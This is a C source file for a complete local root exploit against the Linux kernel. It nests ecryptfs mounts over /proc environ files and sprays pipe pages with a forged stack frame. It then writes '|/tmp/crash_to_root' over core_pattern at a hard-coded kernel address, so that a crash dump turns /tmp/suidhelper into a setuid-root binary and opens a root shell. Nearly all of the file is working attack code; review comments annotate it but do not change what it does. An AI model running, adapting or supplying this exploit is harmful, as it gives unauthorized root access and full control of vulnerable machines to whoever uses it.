#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdint.h>
#include <keyutils.h>
#include <errno.h>
#include <ecryptfs.h>
#include <sys/eventfd.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <stdbool.h>
#include <assert.h>
#include <sys/wait.h>
#include <sched.h>
#include <sys/resource.h>
#include <dirent.h>

/*
 * Launch the external ./hello helper on /tmp/fuse_mount (creating the
 * directory if needed) and map the file "hello" inside that mount.
 *
 * len: forwarded to the helper on its command line and used as the length
 *      of the mapping.
 *
 * Returns the address of a private, read-only mapping of
 * /tmp/fuse_mount/hello. Any failure terminates the process through
 * err()/errx().
 *
 * NOTE(review): the descriptor opened here is never closed; whether that is
 * deliberate cannot be told from this file.
 */
void *map_fuse_sleeper_area(int len) {
  char shell_cmd[500];

  snprintf(shell_cmd, sizeof(shell_cmd),
           "mkdir -p /tmp/fuse_mount && ./hello /tmp/fuse_mount %d", len);
  if (system(shell_cmd) != 0)
    errx(1, "system() failed");

  int hello_fd = open("/tmp/fuse_mount/hello", O_RDWR);
  if (hello_fd == -1)
    err(1, "unable to open FUSE fd");

  void *mapping = mmap(NULL, len, PROT_READ, MAP_PRIVATE, hello_fd, 0);
  if (mapping == MAP_FAILED)
    err(1, "unable to mmap FUSE fd");

  return mapping;
}

/*
 * Point this process's recorded argument and environment areas at the buffer
 * [ptr, ptr + size) by installing a new memory-map descriptor with
 * prctl(PR_SET_MM, PR_SET_MM_MAP).
 *
 * ptr:  start of the buffer to expose.
 * size: length of the buffer in bytes.
 *
 * Side effect: maps a fresh anonymous page with MAP_FIXED at the first page
 * boundary at or after ptr + size, replacing whatever was mapped there.
 * Exits through err() if either the mmap() or the prctl() fails.
 */
void set_env_and_arg_area(char *ptr, size_t size) {
  // ensure that reading from argv works by putting a zero at the end.
  // The page is a new anonymous mapping (zero-filled), and arg_end below is
  // placed one byte into it, so the argument area ends on a zero byte.
  char *argv_fixup_page = (void*)((unsigned long)(ptr + size + 0xfff) & ~0xfff);
  if (mmap(argv_fixup_page, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0) != argv_fixup_page)
    err(1, "mmap(argv_fixup_page)");

  // Only the arg_* and env_* fields carry caller-supplied values; the code,
  // data and stack fields are fixed constants.
  // NOTE(review): presumably those constants exist only to satisfy the
  // kernel's sanity checks on the map - confirm.
  struct prctl_mm_map mm_map = {
    .start_code = 0x400000,
    .end_code = 0x400001,
    .start_data = 0x400002,
    .end_data = 0x400003,
    .start_brk = 0x400004,
    .brk = (uint64_t)sbrk(0),               // current program break, unchanged
    .start_stack = 0x100000000,
    .arg_start = (uint64_t)ptr,             // argument area: buffer plus one byte of the fixup page
    .arg_end = (uint64_t)(argv_fixup_page + 1),
    .env_start = (uint64_t)ptr,             // environment area: exactly the buffer
    .env_end = (uint64_t)ptr + size,
    .auxv_size = 0,                         // no auxiliary vector supplied
    .exe_fd = -1                            // do not change the executable link
  };
  if (prctl(PR_SET_MM, PR_SET_MM_MAP, &mm_map, sizeof(mm_map), 0))
    err(1, "PR_SET_MM_MAP");
}

/*
 * Create (or truncate) the file "<dir>/<name>" with mode 0600 and write the
 * NUL-terminated string `data` to it.
 *
 * dir:  directory component of the path.
 * name: file name inside `dir`.
 * data: NUL-terminated contents; the terminator itself is not written.
 *
 * The joined path must fit in 500 bytes including the terminator; a longer
 * path is reported as an error instead of overflowing the buffer. Short
 * writes are continued until all bytes are stored, and EINTR is retried.
 * Any failure terminates the process through err()/errx().
 */
void write_file(char *dir, char *name, char *data) {
  char path[500];
  int path_len = snprintf(path, sizeof(path), "%s/%s", dir, name);
  if (path_len < 0 || (size_t)path_len >= sizeof(path))
    errx(1, "path %s/%s is too long", dir, name);

  int fd = open(path, O_WRONLY|O_TRUNC|O_CREAT, 0600);
  if (fd == -1)
    err(1, "opening %s failed", path);

  const char *cursor = data;
  size_t remaining = strlen(data);
  while (remaining > 0) {
    ssize_t written = write(fd, cursor, remaining);
    if (written < 0) {
      if (errno == EINTR)
        continue;
      err(1, "write to %s failed", path);
    }
    /* a zero-byte result would never make progress; treat it as failure */
    if (written == 0)
      errx(1, "write to %s failed", path);
    cursor += written;
    remaining -= (size_t)written;
  }

  /* close() can report deferred write errors, so do not ignore it */
  if (close(fd))
    err(1, "closing %s failed", path);
}

/*
 * Read the whole file "<dir>/<name>" into a freshly malloc()ed buffer.
 *
 * dir:  directory component of the path.
 * name: file name inside `dir`.
 * data: out parameter; receives the buffer, which the caller owns and must
 *       free(). The buffer is not NUL-terminated.
 *
 * Returns the number of bytes read, which is the size fstat() reported.
 *
 * The joined path must fit in 500 bytes including the terminator. Short
 * reads are continued until the full size has been read, and EINTR is
 * retried. An empty file yields a valid (non-NULL) buffer and a return value
 * of 0. Any failure, including the file being shorter than fstat() reported,
 * terminates the process through err()/errx().
 */
size_t read_file(char *dir, char *name, char **data) {
  char path[500];
  int path_len = snprintf(path, sizeof(path), "%s/%s", dir, name);
  if (path_len < 0 || (size_t)path_len >= sizeof(path))
    errx(1, "path %s/%s is too long", dir, name);

  int fd = open(path, O_RDONLY);
  if (fd == -1)
    err(1, "open \"%s\"", path);

  struct stat st;
  if (fstat(fd, &st))
    err(1, "fstat");
  size_t size = (size_t)st.st_size;

  /* malloc(0) may legitimately return NULL, so always ask for >= 1 byte */
  char *buf = malloc(size ? size : 1);
  if (!buf)
    err(1, "malloc");

  size_t done = 0;
  while (done < size) {
    ssize_t got = read(fd, buf + done, size - done);
    if (got < 0) {
      if (errno == EINTR)
        continue;
      err(1, "read_file read");
    }
    /* end of file before the size fstat() promised */
    if (got == 0)
      errx(1, "read_file read");
    done += (size_t)got;
  }

  close(fd);
  *data = buf;
  return size;
}

/*
 * Map the first `len` bytes of the file at `path` into memory.
 *
 * path: file to open read-only.
 * len:  number of bytes to map, starting at offset 0.
 *
 * Returns the address of a private, read-only mapping. The descriptor is
 * closed before returning; the mapping remains valid. Failure to open or to
 * map terminates the process through err().
 */
char *mmap_file(char *path, size_t len) {
  int src_fd = open(path, O_RDONLY);
  if (src_fd == -1)
    err(1, "open \"%s\"", path);

  errno = 0;
  void *mapping = mmap(NULL, len, PROT_READ, MAP_PRIVATE, src_fd, 0);
  if (mapping == MAP_FAILED)
    err(1, "mmap");

  close(src_fd);
  return (char *)mapping;
}

/*
 * Copy "<srcdir>/<srcname>" to "<dstdir>/<dstname>" by running cp(1) through
 * the shell.
 *
 * Both paths are wrapped in single quotes on the command line. A component
 * that itself contains a single quote would break that quoting; the callers
 * in this file only pass fixed directory names and decimal numbers.
 *
 * The complete command must fit in 1000 bytes including the terminator; a
 * longer command is reported as an error instead of overflowing the buffer.
 * A non-zero result from system() terminates the process through errx().
 */
void copy_file(char *srcdir, char *srcname, char *dstdir, char *dstname) {
  char cmd[1000];
  int cmd_len = snprintf(cmd, sizeof(cmd), "cp '%s/%s' '%s/%s'",
                         srcdir, srcname, dstdir, dstname);
  if (cmd_len < 0 || (size_t)cmd_len >= sizeof(cmd))
    errx(1, "copy command for %s/%s is too long", srcdir, srcname);

  if (system(cmd))
    errx(1, "system(\"%s\")", cmd);
}

/*
 * Block until one 8-byte counter value can be read from `fd`.
 *
 * The value itself is discarded. Anything other than a full 8-byte read
 * terminates the process through err().
 */
void eventfd_wait(int fd) {
  uint64_t counter;

  if (read(fd, &counter, sizeof(counter)) == (ssize_t)sizeof(counter))
    return;
  err(1, "eventfd_wait");
}

/*
 * Post one notification on `fd` by writing the 8-byte value 1 to it.
 *
 * Anything other than a full 8-byte write terminates the process through
 * err().
 */
void eventfd_send(int fd) {
  const uint64_t increment = 1;

  if (write(fd, &increment, sizeof(increment)) == (ssize_t)sizeof(increment))
    return;
  err(1, "eventfd_send");
}

/*
 * Number of nesting levels: recurser_main() creates this many nested files
 * and forks this many helper children, one per level.
 */
#define MATROSKA_DEPTH 14

/* PIDs of the helper children forked by recurser_main(), indexed by level. */
pid_t children[MATROSKA_DEPTH];
/* Per-level eventfds: signalled by recurser_main(), waited on by child i. */
int sync_eventfds_to_child[MATROSKA_DEPTH];
/* Per-level eventfds: signalled by child i, waited on by recurser_main(). */
int sync_eventfds_from_child[MATROSKA_DEPTH];

/*
 * Send the file descriptor `fd` over the UNIX-domain socket `sock` as an
 * SCM_RIGHTS control message.
 *
 * No payload bytes accompany the control message. The only caller in this
 * file uses a SOCK_DGRAM socketpair.
 *
 * The control buffer is sized and filled with the CMSG_* macros and is
 * aligned for struct cmsghdr through the union, as cmsg(3) recommends. The
 * descriptor is stored with memcpy() rather than through a cast pointer.
 *
 * Terminates the process through err() if sendmsg() fails.
 */
void sendfd(int sock, int fd) {
  union {
    char buf[CMSG_SPACE(sizeof(int))];
    struct cmsghdr align;
  } control;
  /* zero the padding so no uninitialised stack bytes reach the kernel */
  memset(&control, 0, sizeof(control));

  struct msghdr msg = {
    .msg_control = control.buf,
    .msg_controllen = sizeof(control.buf)
  };

  struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
  hdr->cmsg_len = CMSG_LEN(sizeof(int));
  hdr->cmsg_level = SOL_SOCKET;
  hdr->cmsg_type = SCM_RIGHTS;
  memcpy(CMSG_DATA(hdr), &fd, sizeof(fd));

  if (sendmsg(sock, &msg, 0) < 0)
    err(1, "sendmsg");
}

/*
 * Receive one file descriptor sent as an SCM_RIGHTS control message over the
 * UNIX-domain socket `sock`.
 *
 * Returns the received descriptor, which the caller owns.
 *
 * The message is rejected with "got bad message" when no control message
 * arrived, when the control data was truncated, or when the first control
 * message is not a single-descriptor SOL_SOCKET/SCM_RIGHTS message. The
 * header is only inspected after CMSG_FIRSTHDR() has confirmed that control
 * data was actually received. Terminates the process through err() if
 * recvmsg() fails.
 */
int recvfd(int sock) {
  union {
    char buf[CMSG_SPACE(sizeof(int))];
    struct cmsghdr align;
  } control;
  memset(&control, 0, sizeof(control));

  struct msghdr msg = {
    .msg_control = control.buf,
    .msg_controllen = sizeof(control.buf)
  };
  if (recvmsg(sock, &msg, 0) < 0)
    err(1, "recvmsg");
  if (msg.msg_flags & MSG_CTRUNC)
    errx(1, "got bad message");

  /* NULL when the datagram carried no ancillary data at all */
  struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
  if (hdr == NULL || hdr->cmsg_len != CMSG_LEN(sizeof(int))
      || hdr->cmsg_level != SOL_SOCKET || hdr->cmsg_type != SCM_RIGHTS)
    errx(1, "got bad message");

  int fd;
  memcpy(&fd, CMSG_DATA(hdr), sizeof(fd));
  return fd;
}

/*
 * eventfd created in main(). recurser_main() signals it immediately before
 * its final write(), and main() waits on it before starting the last spammer
 * phase.
 */
int recurser_going_to_recurse_notifier_fd;

/*
 * Entry point of the thread that main() creates with clone().
 *
 * In order, it:
 *   1. registers an ecryptfs passphrase key and mounts /tmp/exploit_lower at
 *      /tmp/exploit_mount through mount.ecryptfs_private;
 *   2. creates MATROSKA_DEPTH files, where file i+1 in the mount is a copy of
 *      file i as stored in the lower directory;
 *   3. forks MATROSKA_DEPTH children, each of which installs one lower file
 *      as its argument/environment area and then waits;
 *   4. mounts /proc/<child pid> through ecryptfs once per child;
 *   5. maps the first mount's environ file and releases the children one by
 *      one so that each re-points its area at the next level;
 *   6. obtains a writable uid_map descriptor from a child in a new user
 *      namespace, signals main(), and writes 8 bytes taken from the end of
 *      the mapping to that descriptor.
 *
 * dummyptr: unused.
 *
 * Returns 0 only if the final write() returns normally, which the closing
 * message treats as failure. Every setup error terminates the process through
 * err()/errx().
 */
int recurser_main(void *dummyptr) {
  // first, set up an ecryptfs for matroska creation
  char sig[ECRYPTFS_SIG_SIZE_HEX + 1];
  char salt[ECRYPTFS_SALT_SIZE] = {0};
  if (ecryptfs_add_passphrase_key_to_keyring(sig, "foobar", salt) < 0)
    errx(1, "unable to add key to keyring");
  char ecryptfs_dir[300];
  // NOTE(review): getenv("HOME") may return NULL, and the result is formatted
  // into a fixed 300-byte buffer without a bound.
  sprintf(ecryptfs_dir, "%s/.ecryptfs", getenv("HOME"));
  if (mkdir(ecryptfs_dir, 0700) && errno != EEXIST)
    err(1, "mkdir");
  /* single line; no filename encryption key */
  write_file(ecryptfs_dir, "exploit.sig", sig);
  if (mkdir("/tmp/exploit_mount", 0700) && errno != EEXIST)
    err(1, "mkdir in /tmp");
  if (mkdir("/tmp/exploit_lower", 0700) && errno != EEXIST)
    err(1, "mkdir in /tmp");
  // exploit.conf holds an fstab-style line naming the lower directory and the
  // mount point for the "exploit" alias used by mount.ecryptfs_private.
  char conf_data[500];
  sprintf(conf_data, "/tmp/exploit_lower /tmp/exploit_mount ecryptfs none 0 0\n");
  write_file(ecryptfs_dir, "exploit.conf", conf_data);
  if (system("/sbin/mount.ecryptfs_private exploit"))
    errx(1, "mount1 failed");

  // now, create the matroskas
  char MATROSKA_ZERO[50 * 1024]; /* 50KiB, should be sufficient to prevent caching */
  // NOTE(review): the whole array is filled with 0x42 and never NUL-terminated,
  // yet write_file() determines the length with strlen(). The number of bytes
  // written therefore depends on whatever follows the array in memory.
  memset(MATROSKA_ZERO, 0x42, sizeof(MATROSKA_ZERO));
  write_file("/tmp/exploit_mount", "1", MATROSKA_ZERO);
  sync();
  // File i+1 (written through the mount) receives the contents of file i as
  // it is stored in the lower directory, so each level wraps the previous one.
  for (int i=1; i<MATROSKA_DEPTH; i++) {
    char i_str[10];
    char nexti_str[10];
    sprintf(i_str, "%d", i);
    sprintf(nexti_str, "%d", i+1);
    copy_file("/tmp/exploit_lower", i_str, "/tmp/exploit_mount", nexti_str);
    sync();
  }

  // create the per-level synchronisation eventfds, then the helper children
  // (these are forked processes, not threads)
  for (int i=0; i<MATROSKA_DEPTH; i++) {
    sync_eventfds_to_child[i] = eventfd(0, EFD_SEMAPHORE);
    if (sync_eventfds_to_child[i] == -1)
      err(1, "eventfd");
    sync_eventfds_from_child[i] = eventfd(0, EFD_SEMAPHORE);
    if (sync_eventfds_from_child[i] == -1)
      err(1, "eventfd");
  }
  for (int i=0; i<MATROSKA_DEPTH; i++) {
    pid_t child = fork();
    if (child == -1)
      err(1, "fork");
    if (child == 0) {
      // Child i: load lower file i+1 into memory and expose it as this
      // process's argument/environment area.
      char filenumstr[10];
      sprintf(filenumstr, "%d", i+1);
      char *direct_matroska;
      size_t direct_matroska_len = read_file("/tmp/exploit_lower", filenumstr, &direct_matroska);
      set_env_and_arg_area(direct_matroska, direct_matroska_len);

      // Note: This yields control to the main process and only resumes after all the children
      // have passed this point!
      eventfd_send(sync_eventfds_from_child[i]);
      eventfd_wait(sync_eventfds_to_child[i]);

      if (i == MATROSKA_DEPTH - 1) {
        // replace memory with FUSE sleeping-pagefault area
        // note: following ecryptfs reads will return garbage
        set_env_and_arg_area(map_fuse_sleeper_area(direct_matroska_len), direct_matroska_len);
      } else {
        // map lower environ/cmdline as environ+cmdline
        // Mount i+1 is backed by /proc/<children[i+1]>, so child i now exposes
        // a mapping of the next child's environ (or cmdline) file.
        // NOTE(review): why levels with i >= 10 use "cmdline" instead of
        // "environ" is not evident from this file.
        char new_env_path[300];
        sprintf(new_env_path, "/tmp/exploit_mounts/%d/%s", i+1, (i < 10) ? "environ" : "cmdline");
        char *new_env = mmap_file(new_env_path, direct_matroska_len);
        set_env_and_arg_area(new_env, direct_matroska_len);
      }

      // report completion, then stay alive until signalled again
      eventfd_send(sync_eventfds_from_child[i]);
      eventfd_wait(sync_eventfds_to_child[i]);

      exit(0);
    }
    // parent: wait until child i has installed its first area
    eventfd_wait(sync_eventfds_from_child[i]);
    children[i] = child;
  }

  // set up mounts: mount i has /proc/<children[i]> as its lower directory
  if (mkdir("/tmp/exploit_mounts", 0700) && errno != EEXIST)
    err(1, "mkdir in /tmp");
  for (int i=0; i<MATROSKA_DEPTH; i++) {
    char exploit_mount_subpath[300];
    sprintf(exploit_mount_subpath, "/tmp/exploit_mounts/%d", i);
    if (mkdir(exploit_mount_subpath, 0700) && errno != EEXIST)
      err(1, "mkdir in /tmp");

    // note: the umount helper removed the key, reinsert it
    if (ecryptfs_add_passphrase_key_to_keyring(sig, "foobar", salt) < 0)
      errx(1, "unable to add key to keyring");
    // the "exploit" alias is rewritten for every mount
    sprintf(conf_data, "/proc/%d /tmp/exploit_mounts/%d ecryptfs none 0 0\n", (int)children[i], i);
    write_file(ecryptfs_dir, "exploit.conf", conf_data);
    if (system("/sbin/mount.ecryptfs_private exploit"))
      errx(1, "system failed");
  }

  // map lower environ
  // top_map is the outermost layer: child 0's environ seen through mount 0.
  char *top_map = mmap_file("/tmp/exploit_mounts/0/environ", sizeof(MATROSKA_ZERO));
  // Release the children in order; each one re-points its area at the next
  // level and reports back before the following child is released.
  for (int i=0; i<MATROSKA_DEPTH; i++) {
      eventfd_send(sync_eventfds_to_child[i]);
      eventfd_wait(sync_eventfds_from_child[i]);
  }

  puts("fault chain set up, faulting now");


  /* can't unshare on the current thread - we're multithreaded. sooo... */
  // A forked child enters a new user namespace, opens its own uid_map for
  // writing and passes that descriptor back over the socketpair.
  int fd_transfer_socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, fd_transfer_socks))
    err(1, "socketpair");
  pid_t newns_child = fork();
  if (newns_child == -1)
    err(1, "fork");
  if (newns_child == 0) {
    if (unshare(CLONE_NEWUSER))
      err(1, "unshare userns");
    int target_fd = open("/proc/self/uid_map", O_WRONLY);
    if (target_fd == -1)
      err(1, "open uid_map");
    sendfd(fd_transfer_socks[0], target_fd);
    exit(0);
  }
  int target_fd = recvfd(fd_transfer_socks[1]);

  // tell main() that the final write is about to start
  eventfd_send(recurser_going_to_recurse_notifier_fd);

  // The source buffer is the last 8 bytes of top_map.
  // NOTE(review): presumably reading it faults through every stacked layer
  // down to the FUSE-backed mapping - confirm. The return value is ignored.
  write(target_fd, top_map + sizeof(MATROSKA_ZERO) - 8, 8);

  puts("still alive in original context? that's really weird. something failed.");
  return 0;
}

/* Number of pipes each spammer() process creates; computed in main() from RLIMIT_NOFILE. */
int pipes_per_process;

/* Backing storage whose end address new_stack[] supplies as the user RSP. */
char post_corruption_user_stack[8000000];

/*
 * Copy `len` bytes from `buf` to the address `addr` by routing them through
 * a temporary pipe: the bytes are written into the pipe and then read()
 * back out with `addr` as the destination buffer.
 *
 * addr: destination address, passed to read() as a pointer. The caller in
 *       this file passes a kernel-space address.
 * buf:  source bytes.
 * len:  number of bytes to transfer.
 *
 * Both pipe ends are closed before returning. A failed pipe() terminates the
 * process through err(); a short or failed transfer terminates it through
 * errx().
 */
void kernel_write(unsigned long addr, char *buf, size_t len) {
  int pipe_ends[2];
  if (pipe(pipe_ends) != 0)
    err(1, "pipe");
  const int read_end = pipe_ends[0];
  const int write_end = pipe_ends[1];

  ssize_t queued = write(write_end, buf, len);
  if ((size_t)queued != len)
    errx(1, "pipe write");
  close(write_end);

  char *destination = (char *)addr;
  ssize_t drained = read(read_end, destination, len);
  if ((size_t)drained != len)
    errx(1, "pipe read to kernelspace");
  close(read_end);
}

/* Marker string. NOTE(review): nothing in this file references it. */
char post_corruption_env_cmdline[] = "EXPLOIT POST-CORRUPTION";

/*
 * Code whose address new_stack[] supplies as the user RIP.
 *
 * It kills and reaps every helper child, then uses kernel_write() to store
 * the string "|/tmp/crash_to_root" at a hard-coded address, and exits.
 *
 * NOTE(review): main() polls /proc/sys/kernel/core_pattern for exactly this
 * string, so the hard-coded address is presumably the core_pattern buffer of
 * one specific kernel build - confirm before relying on it.
 *
 * This function never returns; it always leaves through exit() or err().
 */
void post_corruption_user_code(void) {
  int status;
  puts("post-corruption code is alive!");

  /* kill all our children to prevent their environ/cmdline from messing up the system */
  for (int i=0; i<MATROSKA_DEPTH; i++) {
    if (kill(children[i], SIGKILL))
      err(1, "kill failed");
    waitpid(children[i], &status, 0);
  }
  puts("children should be dead");

  /* the trailing NUL is written too, hence strlen()+1 */
  char *core_handler = "|/tmp/crash_to_root";
  kernel_write(0xffffffff81e87a60, core_handler, strlen(core_handler)+1);

  puts("coredump handler set. recurser exiting.");
  exit(0);

  /* must not return! there is no stackframe above. */
}

/*
 * Replacement stack contents that spammer() writes into every pipe.
 *
 * The layout is one return address, sixteen register slots, then user RIP,
 * CS, EFLAGS, RSP and SS, so that execution continues in
 * post_corruption_user_code() on post_corruption_user_stack.
 *
 * NOTE(review): the first entry is a hard-coded kernel address and the frame
 * shape presumably matches one specific kernel build - confirm.
 */
unsigned long new_stack[] = {
  0xffffffff818252f2, /* return pointer of syscall handler */
  0x1515151515151515, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* 16 useless registers */
  (unsigned long) post_corruption_user_code, /* user RIP */
  0x33, /* user CS */
  0x246, /* EFLAGS: most importantly, turn interrupts on */
  (unsigned long) (post_corruption_user_stack + sizeof(post_corruption_user_stack)), /* user RSP */
  0x2b /* user SS */
};

/*
 * Body of each spammer child forked by main(). Never returns.
 *
 * The function works in three phases and stops itself with SIGSTOP after
 * each one; main() resumes it with SIGCONT:
 *   1. create pipes_per_process pipes, keeping only the write ends in an
 *      array (the read ends are neither stored nor closed);
 *   2. write 0xcb0 bytes to every pipe;
 *   3. append new_stack[] to every pipe.
 * After the third resume it exits with status 0.
 */
void spammer(void) {
  int write_fds[pipes_per_process];

  /* make sure this process dies with its parent */
  prctl(PR_SET_PDEATHSIG, SIGKILL);

  /* first, prepare empty pipes */
  for (int i=0; i<pipes_per_process; i++) {
    int fds[2];
    if (pipe(fds))
      err(1, "pipe");
    write_fds[i] = fds[1];
  }

  raise(SIGSTOP);

  /*
   * on SIGCONT, write data to each pipe, with the following purposes:
   *  - causing allocation of one page per pipe
   *  - marking those pages so they're recognizable in gdb
   *  - move the write pointer to the offset of the first return pointer,
   *    to avoid clobbering stuff in front of it later
   */
  /* "#~#~" is the marker; the rest of the 0xcb0-byte buffer is zero-filled */
  char pipe_data[0xcb0] = "#~#~";
  for (int i=0; i<pipes_per_process; i++) {
    errno = 0;
    if (write(write_fds[i], pipe_data, sizeof(pipe_data)) != sizeof(pipe_data))
      err(1, "write");
  }

  raise(SIGSTOP);

  /*
   * At this point, the recurser's RSP should point into one of the pipe pages.
   * Spray all of them with our new stackframe.
   */
  /* the padding plus the frame must stay within a single 0x1000-byte page */
  assert(sizeof(pipe_data) + sizeof(new_stack) < 0x1000);
  for (int i=0; i<pipes_per_process; i++) {
    errno = 0;
    if (write(write_fds[i], new_stack, sizeof(new_stack)) != sizeof(new_stack))
      err(1, "write");
  }

  raise(SIGSTOP);

  exit(0);
}

/* Stack memory for the recurser_main() thread; main() passes its end address to clone(). */
char recurser_stack[8000000];

// basically `killall -9 hello`, but guaranteed to not access cmdline
/*
 * Send SIGKILL to every process whose /proc/<pid>/comm starts with "hello".
 *
 * The process name is read from "comm" only. Entries of /proc whose name
 * does not begin with a digit are skipped, as are entries that cannot be
 * entered or whose comm file cannot be opened. A failing kill() is reported
 * with perror() and does not stop the scan.
 *
 * Side effect: the working directory is /proc when the function returns.
 * Failure to enter /proc, to open it, or to step back out of a process
 * directory terminates the process through err().
 */
void kill_all_fuse_and_helpers(void) {
  if (chdir("/proc"))
    err(1, "unable to chdir into /proc");
  DIR *d = opendir(".");
  if (!d)
    err(1, "opendir");

  struct dirent *dent;
  while ((dent = readdir(d)) != NULL) {
    if (dent->d_name[0] < '0' || dent->d_name[0] > '9')
      continue;
    /* the process may already be gone; that is not an error */
    if (chdir(dent->d_name))
      continue;

    int comm_fd = open("comm", O_RDONLY);
    if (comm_fd != -1) {
      char comm[20];
      ssize_t res = read(comm_fd, comm, sizeof(comm) - 1);
      /* a failed read is treated as an empty name */
      comm[res < 0 ? 0 : res] = 0;
      close(comm_fd);

      if (strncmp(comm, "hello", 5) == 0) {
        int kill_target = atoi(dent->d_name);
        printf("killing %d\n", kill_target);
        if (kill(kill_target, SIGKILL))
          perror("kill");
      }
    }

    if (chdir(".."))
      err(1, "chdir");
  }

  /* release the directory stream and its descriptor */
  closedir(d);
}

/*
 * Program entry point: orchestrates the helper processes.
 *
 * In order, it:
 *   1. copies ./suidhelper to /tmp and writes the /tmp/crash_to_root script;
 *   2. raises RLIMIT_NOFILE to its hard limit and forks the spammer
 *      processes, waiting for each to stop itself;
 *   3. forks the recurser parent, which (once resumed) starts
 *      recurser_main() as a thread and exits only its own thread;
 *   4. resumes the spammers one at a time for their second phase and resumes
 *      the recurser parent halfway through;
 *   5. waits for the recurser's notification, sleeps, and resumes the
 *      spammers for their third phase;
 *   6. kills every process whose name starts with "hello", raises
 *      RLIMIT_CORE, and polls core_pattern until it starts with
 *      "|/tmp/crash_to_root";
 *   7. forks a child that raises SIGSEGV, waits for /tmp/suidhelper to gain
 *      the setuid bit, and executes it.
 *
 * Does not return on success (execl replaces the process image). Every
 * failure terminates the process through err()/errx().
 *
 * NOTE(review): pipes_per_process is derived from rlim_max without range
 * checks. A hard limit below 12 makes it 0 (division by zero below), and a
 * very large limit makes spammer_count 0 (zero-length VLA).
 */
int main(void) {
  int status;

  if (system("cp suidhelper /tmp/"))
    errx(1, "unable to copy suidhelper to /tmp - maybe you're not running me from the exploit directory?");

  write_file("/tmp", "crash_to_root", "#!/bin/bash\nchown root:root /tmp/suidhelper\nchmod 06755 /tmp/suidhelper\n");
  if (system("chmod +x /tmp/crash_to_root"))
    errx(1, "chmodding /tmp/crash_to_root executable");

  recurser_going_to_recurse_notifier_fd = eventfd(0, EFD_SEMAPHORE);
  if (recurser_going_to_recurse_notifier_fd == -1)
    err(1, "eventfd");

  // raise RLIMIT_NOFILE as high as we can
  struct rlimit rlim;
  if (getrlimit(RLIMIT_NOFILE, &rlim))
    err(1, "getrlimit");
  rlim.rlim_cur = rlim.rlim_max;
  if (setrlimit(RLIMIT_NOFILE, &rlim))
    err(1, "setrlimit");
  /* two descriptors per pipe, with ten descriptors kept in reserve */
  pipes_per_process = (rlim.rlim_max - 10) / 2;

  // prepare a bunch of children ready to spam
  int spammer_count = 300000 / pipes_per_process; /* must be well below ((/proc/sys/fs/file-max) / 2) */
  pid_t spammers[spammer_count];
  for (int i=0; i<spammer_count; i++) {
    spammers[i] = fork();
    if (spammers[i] == -1)
      err(1, "fork");
    if (spammers[i] == 0)
      spammer();
    /* WUNTRACED: return once the spammer has stopped itself after phase 1 */
    if (waitpid(spammers[i], &status, WUNTRACED) != spammers[i])
      err(1, "first waitpid spammer");
  }
  puts("all spammers ready");

  pid_t recurser_parent = fork();
  if (recurser_parent == -1)
    err(1, "fork");
  if (recurser_parent == 0) {
    raise(SIGSTOP);
    usleep(100);
    /* reduce the memory allocations for this fork as much as possible */
    int child = clone(recurser_main, recurser_stack + sizeof(recurser_stack), CLONE_FILES | CLONE_FS | CLONE_IO | CLONE_SIGHAND | CLONE_SYSVSEM | CLONE_THREAD | CLONE_VM, NULL);
    if (child == -1)
      err(1, "clone");
    /* end only this thread; the recurser_main() thread keeps running */
    syscall(__NR_exit, 0); /* not exit_group! */
  }
  if (waitpid(recurser_parent, &status, WUNTRACED) != recurser_parent)
    err(1, "waitpid recurser_parent");
  puts("recurser parent ready");

  /* second spammer phase; the recurser is released halfway through */
  for (int i=0; i<spammer_count; i++) {
    kill(spammers[i], SIGCONT);
    if (i == spammer_count / 2) {
      kill(recurser_parent, SIGCONT);
    }
    if (waitpid(spammers[i], &status, WUNTRACED) != spammers[i])
      err(1, "second waitpid spammer");
  }
  puts("spam over");

  eventfd_wait(recurser_going_to_recurse_notifier_fd);
  /*
   * We have time, and we really don't want to fail at this point just because we raced with
   * the recurser.
   */
  sleep(2);

  // now spray the stackframes
  puts("writing stackframes");
  for (int i=0; i<spammer_count; i++) {
    kill(spammers[i], SIGCONT);
    if (waitpid(spammers[i], &status, WUNTRACED) != spammers[i])
      err(1, "waitpid spammer");
  }
  puts("stackframes written");

  // ... aaand resume and hope it doesn't die horribly because we missed?
  kill_all_fuse_and_helpers();

  /* allow core dumps up to the hard limit */
  if (getrlimit(RLIMIT_CORE, &rlim))
    err(1, "getrlimit");
  rlim.rlim_cur = rlim.rlim_max;
  if (setrlimit(RLIMIT_CORE, &rlim))
    err(1, "setrlimit");

  /* poll until core_pattern starts with the expected handler string */
  while (1) {
    int coredump_fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
    if (coredump_fd == -1)
      err(1, "open core_pattern");
    char buf[1000];
    ssize_t read_res = read(coredump_fd, buf, sizeof(buf)-1);
    if (read_res == -1)
      err(1, "read from core_pattern");
    /* read() does not terminate the data; strstr() needs a C string */
    buf[read_res] = 0;
    close(coredump_fd);
    if (strstr(buf, "|/tmp/crash_to_root") == buf)
      break;
  }
  pid_t dumper_child = fork();
  if (dumper_child == -1)
    err(1, "fork dumper_child");
  if (dumper_child == 0) {
    puts("going to crash now");
    raise(SIGSEGV);
  }

  /* wait for /tmp/suidhelper to gain the setuid bit */
  struct stat helperstat;
  while (1) {
    if (stat("/tmp/suidhelper", &helperstat))
      err(1, "stat suidhelper");
    if (helperstat.st_mode & S_ISUID)
      break;
    sleep(1);
  }
  fputs("suid file detected, launching rootshell...\n", stderr);
  execl("/tmp/suidhelper", "suidhelper", NULL);
  err(1, "execl suidhelper");
}
